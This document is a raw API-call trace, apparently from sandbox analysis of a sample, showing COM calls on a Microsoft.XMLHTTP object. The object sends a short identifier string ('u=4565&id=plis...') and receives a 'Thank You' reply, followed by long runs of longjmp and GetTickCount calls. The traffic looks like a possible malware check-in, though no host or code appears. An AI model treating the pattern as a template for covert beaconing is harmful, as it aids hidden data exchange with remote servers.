	[0161.494] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26bf00 | out: ppvObject=0x26bf00*=0x0) returned 0x80004002
	[0161.494] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26bf00 | out: ppvObject=0x26bf00*=0x0) returned 0x80004002
	[0161.494] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0161.494] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0161.494] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26d018 | out: ppvObject=0x26d018*=0x3cacc0) returned 0x0
	[0161.494] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x26d010 | out: ppvObject=0x26d010*=0x0) returned 0x80004002
	[0161.494] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0161.494] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0161.494] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf0 | out: ppvObject=0x26dbf0*=0x0) returned 0x80004002
	[0161.494] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd90*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db44 | out: rgDispId=0x26db44*=5) returned 0x0
	[0161.494] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0161.494] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0161.494] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=5, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x26d8a8*(rgvarg=([0]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d9c0*(varType=0x8, wReserved1=0xa, wReserved2=0x0, wReserved3=0x0, varVal1="u=4565&id=plis&k=4565&u=4565", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=([0]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d9c0*(varType=0x8, wReserved1=0xa, wReserved2=0x0, wReserved3=0x0, varVal1="u=4565&id=plis&k=4565&u=4565", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0161.495] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26cf48 | out: ppvObject=0x26cf48*=0x3cacc0) returned 0x0
	[0161.495] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7feff837e20*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7feff837e20*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x5a52f98 | out: ppvObject=0x5a52f98*=0x0) returned 0x80004002
	[0161.495] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0161.495] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26ba48 | out: ppvObject=0x26ba48*=0x3cacc0) returned 0x0
	[0161.495] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7feff83f170*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), riid=0x7feff83f170*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), ppvObject=0x115888 | out: ppvObject=0x115888*=0x0) returned 0x80004002
	[0161.495] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0171.733] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0171.733] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf8 | out: ppvObject=0x26dbf8*=0x0) returned 0x80004002
	[0171.733] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd10*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db4c | out: rgDispId=0x26db4c*=10) returned 0x0
	[0171.733] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0171.733] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0171.733] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=10, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d8a8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be60, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="'Thank You: 33857708", varVal2=0x0), pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0171.733] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0171.734] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d4a8 | out: ppvObject=0x26d4a8*=0x0) returned 0x80004002
	[0171.734] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26d5c0*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26d3fc | out: rgDispId=0x26d3fc*=7) returned 0x0
	[0171.734] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0171.734] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d180 | out: ppvObject=0x26d180*=0x0) returned 0x80004002
	[0171.734] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=7, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18, pExcepInfo=0x26d1a0, puArgErr=0x26d170 | out: pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18*(varType=0x3, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xc8, varVal2=0x0), pExcepInfo=0x26d1a0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d170*=0x0) returned 0x0
	[0171.734] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0171.735] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0171.735] malloc (_Size=0xb0) returned 0x42e060
	[0171.737] GetTickCount () returned 0x1161871
	[0171.737] GetTickCount () returned 0x1161871
	[0171.737] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d4a8 | out: ppvObject=0x26d4a8*=0x0) returned 0x80004002
	[0171.737] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26d5c0*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26d3fc | out: rgDispId=0x26d3fc*=7) returned 0x0
	[0171.737] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0171.737] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d180 | out: ppvObject=0x26d180*=0x0) returned 0x80004002
	[0171.737] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=7, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18, pExcepInfo=0x26d1a0, puArgErr=0x26d170 | out: pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18*(varType=0x3, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xc8, varVal2=0x0), pExcepInfo=0x26d1a0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d170*=0xffffffff) returned 0x0
	[0171.737] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0171.738] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x1
	[0171.738] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x0
	[0171.738] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0171.740] longjmp () 
	[0171.740] longjmp () 
	[0171.740] longjmp () 
	[0171.740] GetCurrentThreadId () returned 0x9a8
	[0171.740] GetCurrentThreadId () returned 0x9a8
	[0171.740] ??2@YAPEAX_K@Z () returned 0x3e4000
	[0171.740] malloc (_Size=0x80) returned 0x3c88b0
	[0171.740] longjmp () 
	[0171.741] longjmp () 
	[0171.741] longjmp () 
	[0171.741] longjmp () 
	[0171.741] longjmp () 
	[0171.741] longjmp () 
	[0171.742] longjmp () 
	[0171.742] longjmp () 
	[0171.742] longjmp () 
	[0171.742] longjmp () 
	[0171.742] longjmp () 
	[0171.742] longjmp () 
	[0171.742] longjmp () 
	[0171.743] longjmp () 
	[0171.743] longjmp () 
	[0171.743] longjmp () 
	[0171.743] longjmp () 
	[0171.743] GetTickCount () returned 0x1161881
	[0171.743] longjmp () 
	[0171.743] longjmp () 
	[0171.744] longjmp () 
	[0171.744] longjmp () 
	[0171.744] longjmp () 
	[0171.744] longjmp () 
	[0171.744] longjmp () 
	[0171.744] longjmp () 
	[0171.745] longjmp () 
	[0171.745] longjmp () 
	[0171.745] longjmp () 
	[0171.745] longjmp () 
	[0171.745] longjmp () 
	[0171.746] longjmp () 
	[0171.746] longjmp () 
	[0171.746] longjmp () 
	[0171.746] longjmp () 
	[0171.746] longjmp () 
	[0171.747] longjmp () 
	[0171.747] longjmp () 
	[0171.747] longjmp () 
	[0171.747] longjmp () 
	[0171.748] longjmp () 
	[0171.748] longjmp () 
	[0171.748] longjmp () 
	[0171.749] longjmp () 
	[0171.749] longjmp () 
	[0171.749] longjmp () 
	[0171.749] longjmp () 
	[0171.749] longjmp () 
	[0171.749] longjmp () 
	[0171.750] longjmp () 
	[0171.750] GetTickCount () returned 0x1161881
	[0171.750] longjmp () 
	[0171.750] longjmp () 
	[0171.750] longjmp () 
	[0171.750] longjmp () 
	[0171.751] longjmp () 
	[0171.751] longjmp () 
	[0171.751] longjmp () 
	[0171.751] longjmp () 
	[0171.751] longjmp () 
	[0171.751] longjmp () 
	[0171.752] longjmp () 
	[0171.752] longjmp () 
	[0171.752] longjmp () 
	[0171.752] longjmp () 
	[0171.752] longjmp () 
	[0171.752] longjmp () 
	[0171.753] longjmp () 
	[0171.753] longjmp () 
	[0171.753] longjmp () 
	[0171.753] longjmp () 
	[0171.753] longjmp () 
	[0171.754] longjmp () 
	[0171.754] longjmp () 
	[0171.754] longjmp () 
	[0171.754] longjmp () 
	[0171.754] longjmp () 
	[0171.755] longjmp () 
	[0171.755] longjmp () 
	[0171.755] longjmp () 
	[0171.755] longjmp () 
	[0171.755] longjmp () 
	[0171.756] longjmp () 
	[0171.756] GetTickCount () returned 0x1161881
	[0171.756] longjmp () 
	[0171.756] longjmp () 
	[0171.757] longjmp () 
	[0171.757] longjmp () 
	[0171.757] longjmp () 
	[0171.757] longjmp () 
	[0171.758] longjmp () 
	[0171.758] longjmp () 
	[0171.758] longjmp () 
	[0171.758] longjmp () 
	[0171.758] longjmp () 
	[0171.759] longjmp () 
	[0171.759] longjmp () 
	[0171.759] longjmp () 
	[0171.759] longjmp () 
	[0171.759] longjmp () 
	[0171.760] longjmp () 
	[0171.760] longjmp () 
	[0171.760] longjmp () 
	[0171.760] longjmp () 
	[0171.760] longjmp () 
	[0171.761] longjmp () 
	[0171.761] longjmp () 
	[0171.761] longjmp () 
	[0171.761] longjmp () 
	[0171.761] longjmp () 
	[0171.762] longjmp () 
	[0171.762] longjmp () 
	[0171.762] longjmp () 
	[0171.762] longjmp () 
	[0171.762] longjmp () 
	[0171.763] longjmp () 
	[0171.763] GetTickCount () returned 0x1161890
	[0171.763] longjmp () 
	[0171.763] longjmp () 
	[0171.763] longjmp () 
	[0171.763] longjmp () 
	[0171.764] longjmp () 
	[0171.764] longjmp () 
	[0171.764] longjmp () 
	[0171.764] longjmp () 
	[0171.764] longjmp () 
	[0171.765] longjmp () 
	[0171.765] longjmp () 
	[0171.765] longjmp () 
	[0171.765] longjmp () 
	[0171.765] longjmp () 
	[0171.765] longjmp () 
	[0171.766] longjmp () 
	[0171.766] longjmp () 
	[0171.766] longjmp () 
	[0171.766] longjmp () 
	[0171.766] longjmp () 
	[0171.766] longjmp () 
	[0171.767] longjmp () 
	[0171.767] longjmp () 
	[0171.767] longjmp () 
	[0171.767] longjmp () 
	[0171.767] longjmp () 
	[0171.767] longjmp () 
	[0171.767] longjmp () 
	[0171.768] longjmp () 
	[0171.768] longjmp () 
	[0171.768] longjmp () 
	[0171.768] longjmp () 
	[0171.768] GetTickCount () returned 0x1161890
	[0171.768] longjmp () 
	[0171.769] longjmp () 
	[0171.769] longjmp () 
	[0171.769] longjmp () 
	[0171.769] longjmp () 
	[0171.769] longjmp () 
	[0171.769] longjmp () 
	[0171.770] longjmp () 
	[0171.770] longjmp () 
	[0171.770] longjmp () 
	[0171.770] longjmp () 
	[0171.770] longjmp () 
	[0171.770] longjmp () 
	[0171.771] longjmp () 
	[0171.771] longjmp () 
	[0171.771] longjmp () 
	[0171.771] longjmp () 
	[0171.771] longjmp () 
	[0171.772] longjmp () 
	[0171.772] longjmp () 
	[0171.772] longjmp () 
	[0171.772] longjmp () 
	[0171.773] longjmp () 
	[0171.773] longjmp () 
	[0171.773] longjmp () 
	[0171.773] longjmp () 
	[0171.774] longjmp () 
	[0171.774] longjmp () 
	[0171.774] longjmp () 
	[0171.774] longjmp () 
	[0171.774] longjmp () 
	[0171.774] longjmp () 
	[0171.775] GetTickCount () returned 0x11618a0
	[0171.775] longjmp () 
	[0171.775] longjmp () 
	[0171.775] longjmp () 
	[0171.775] longjmp () 
	[0171.776] longjmp () 
	[0171.776] longjmp () 
	[0171.776] longjmp () 
	[0171.776] longjmp () 
	[0171.776] longjmp () 
	[0171.776] longjmp () 
	[0171.777] longjmp () 
	[0171.777] longjmp () 
	[0171.777] longjmp () 
	[0171.777] longjmp () 
	[0171.777] longjmp () 
	[0171.777] longjmp () 
	[0171.778] longjmp () 
	[0171.778] longjmp () 
	[0171.778] longjmp () 
	[0171.778] longjmp () 
	[0171.778] longjmp () 
	[0171.779] longjmp () 
	[0171.779] longjmp () 
	[0171.779] longjmp () 
	[0171.779] longjmp () 
	[0171.779] longjmp () 
	[0171.779] longjmp () 
	[0171.780] longjmp () 
	[0171.780] longjmp () 
	[0171.780] longjmp () 
	[0171.780] longjmp () 
	[0171.780] longjmp () 
	[0171.781] GetTickCount () returned 0x11618a0
	[0171.781] longjmp () 
	[0171.781] longjmp () 
	[0171.781] longjmp () 
	[0171.781] longjmp () 
	[0171.781] longjmp () 
	[0171.782] longjmp () 
	[0171.782] longjmp () 
	[0171.782] longjmp () 
	[0171.782] longjmp () 
	[0171.782] longjmp () 
	[0171.782] longjmp () 
	[0171.783] longjmp () 
	[0171.783] longjmp () 
	[0171.783] longjmp () 
	[0171.783] longjmp () 
	[0171.783] longjmp () 
	[0171.784] longjmp () 
	[0171.784] longjmp () 
	[0171.784] longjmp () 
	[0171.784] longjmp () 
	[0171.785] longjmp () 
	[0171.785] longjmp () 
	[0171.785] longjmp () 
	[0171.785] longjmp () 
	[0171.786] longjmp () 
	[0171.786] longjmp () 
	[0171.786] longjmp () 
	[0171.786] longjmp () 
	[0171.786] longjmp () 
	[0171.787] longjmp () 
	[0171.787] longjmp () 
	[0171.787] longjmp () 
	[0171.787] GetTickCount () returned 0x11618a0
	[0171.787] longjmp () 
	[0171.787] longjmp () 
	[0171.788] longjmp () 
	[0171.788] longjmp () 
	[0171.788] longjmp () 
	[0171.788] longjmp () 
	[0171.789] longjmp () 
	[0171.789] longjmp () 
	[0171.789] longjmp () 
	[0171.789] longjmp () 
	[0171.790] longjmp () 
	[0171.790] longjmp () 
	[0171.790] longjmp () 
	[0171.790] longjmp () 
	[0171.790] longjmp () 
	[0171.790] longjmp () 
	[0171.791] longjmp () 
	[0171.791] longjmp () 
	[0171.791] longjmp () 
	[0171.791] longjmp () 
	[0171.791] longjmp () 
	[0171.792] longjmp () 
	[0171.792] longjmp () 
	[0171.792] longjmp () 
	[0171.792] longjmp () 
	[0171.792] longjmp () 
	[0171.792] longjmp () 
	[0171.792] longjmp () 
	[0171.793] longjmp () 
	[0171.793] longjmp () 
	[0171.793] longjmp () 
	[0171.793] longjmp () 
	[0171.793] GetTickCount () returned 0x11618af
	[0171.793] longjmp () 
	[0171.793] longjmp () 
	[0171.794] longjmp () 
	[0171.794] longjmp () 
	[0171.794] longjmp () 
	[0171.794] longjmp () 
	[0171.794] longjmp () 
	[0171.794] longjmp () 
	[0171.794] longjmp () 
	[0171.795] longjmp () 
	[0171.795] longjmp () 
	[0171.795] longjmp () 
	[0171.795] longjmp () 
	[0171.795] longjmp () 
	[0171.795] longjmp () 
	[0171.795] longjmp () 
	[0171.796] longjmp () 
	[0171.796] longjmp () 
	[0171.796] longjmp () 
	[0171.796] longjmp () 
	[0171.796] longjmp () 
	[0171.796] longjmp () 
	[0171.797] longjmp () 
	[0171.797] longjmp () 
	[0171.797] longjmp () 
	[0171.797] longjmp () 
	[0171.797] longjmp () 
	[0171.797] longjmp () 
	[0171.797] longjmp () 
	[0171.798] longjmp () 
	[0171.798] longjmp () 
	[0171.798] longjmp () 
	[0171.798] GetTickCount () returned 0x11618af
	[0171.798] longjmp () 
	[0171.798] longjmp () 
	[0171.798] longjmp () 
	[0171.799] longjmp () 
	[0171.799] longjmp () 
	[0171.799] longjmp () 
	[0171.799] longjmp () 
	[0171.799] longjmp () 
	[0171.799] longjmp () 
	[0171.800] longjmp () 
	[0171.800] longjmp () 
	[0171.800] longjmp () 
	[0171.800] longjmp () 
	[0171.800] longjmp () 
	[0171.800] longjmp () 
	[0171.800] longjmp () 
	[0171.801] longjmp () 
	[0171.801] longjmp () 
	[0171.801] longjmp () 
	[0171.801] longjmp () 
	[0171.801] longjmp () 
	[0171.801] longjmp () 
	[0171.802] longjmp () 
	[0171.802] longjmp () 
	[0171.802] longjmp () 
	[0171.802] longjmp () 
	[0171.802] longjmp () 
	[0171.802] longjmp () 
	[0171.802] longjmp () 
	[0171.803] longjmp () 
	[0171.803] longjmp () 
	[0171.803] longjmp () 
	[0171.803] GetTickCount () returned 0x11618af
	[0171.803] longjmp () 
	[0171.804] longjmp () 
	[0171.804] longjmp () 
	[0171.804] longjmp () 
	[0171.804] longjmp () 
	[0171.804] longjmp () 
	[0171.804] longjmp () 
	[0171.805] longjmp () 
	[0171.805] longjmp () 
	[0171.805] longjmp () 
	[0171.805] longjmp () 
	[0171.805] longjmp () 
	[0171.805] longjmp () 
	[0171.806] longjmp () 
	[0171.806] longjmp () 
	[0171.806] longjmp () 
	[0171.806] longjmp () 
	[0171.806] longjmp () 
	[0171.806] longjmp () 
	[0171.806] longjmp () 
	[0171.807] longjmp () 
	[0171.807] longjmp () 
	[0171.807] longjmp () 
	[0171.807] longjmp () 
	[0171.807] longjmp () 
	[0171.808] longjmp () 
	[0171.808] longjmp () 
	[0171.808] longjmp () 
	[0171.808] longjmp () 
	[0171.808] longjmp () 
	[0171.809] longjmp () 
	[0171.809] longjmp () 
	[0171.809] GetTickCount () returned 0x11618bf
	[0171.809] longjmp () 
	[0171.809] longjmp () 
	[0171.810] longjmp () 
	[0171.810] longjmp () 
	[0171.810] longjmp () 
	[0171.810] longjmp () 
	[0171.810] longjmp () 
	[0171.810] longjmp () 
	[0171.811] longjmp () 
	[0171.811] longjmp () 
	[0171.811] longjmp () 
	[0171.811] longjmp () 
	[0171.811] longjmp () 
	[0171.812] longjmp () 
	[0171.812] longjmp () 
	[0171.812] longjmp () 
	[0171.812] longjmp () 
	[0171.812] longjmp () 
	[0171.812] longjmp () 
	[0171.813] longjmp () 
	[0171.813] longjmp () 
	[0171.813] longjmp () 
	[0171.813] longjmp () 
	[0171.813] longjmp () 
	[0171.814] longjmp () 
	[0171.814] longjmp () 
	[0171.814] longjmp () 
	[0171.814] longjmp () 
	[0171.814] longjmp () 
	[0171.814] longjmp () 
	[0171.814] longjmp () 
	[0171.815] longjmp () 
	[0171.815] GetTickCount () returned 0x11618bf
	[0171.815] longjmp () 
	[0171.815] longjmp () 
	[0171.815] longjmp () 
	[0171.815] longjmp () 
	[0171.815] longjmp () 
	[0171.816] longjmp () 
	[0171.816] longjmp () 
	[0171.816] longjmp () 
	[0171.816] longjmp () 
	[0171.816] longjmp () 
	[0171.817] longjmp () 
	[0171.817] longjmp () 
	[0171.817] longjmp () 
	[0171.817] longjmp () 
	[0171.818] longjmp () 
	[0171.818] longjmp () 
	[0171.818] longjmp () 
	[0171.818] longjmp () 
	[0171.818] longjmp () 
	[0171.818] longjmp () 
	[0171.819] longjmp () 
	[0171.819] longjmp () 
	[0171.819] longjmp () 
	[0171.819] longjmp () 
	[0171.819] longjmp () 
	[0171.820] longjmp () 
	[0171.820] longjmp () 
	[0171.820] longjmp () 
	[0171.822] GetTickCount () returned 0x11618cf
	[0171.822] longjmp () 
	[0171.822] longjmp () 
	[0171.822] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x26d970 | out: lpclsid=0x26d970*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0171.822] SysStringLen (param_1=0x0) returned 0x0
